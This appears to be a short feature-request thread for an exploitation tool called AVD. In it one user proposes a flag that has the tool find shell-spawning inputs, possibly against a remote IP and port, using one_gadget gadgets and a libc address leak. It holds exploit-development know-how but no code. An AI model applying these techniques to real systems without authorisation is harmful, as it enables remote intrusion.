Direct shell flag

[icemonster]

Create a flag to indicate you want AVD to try to find an input that spawns a shell. Possibly indicate also an IP and port of a server running that binary for direct exploitation.

[icemonster]

We could use one_gadget https://github.com/david942j/one_gadget to look for shell gadgets in the binary and the used libraries. Then it would be just a matter of using the result as the value for --RET_ADDR flag

[icemonster]

Of course this means we must get a libc base address leak first which is not trivial. Some exploit chaining infrastructure is needed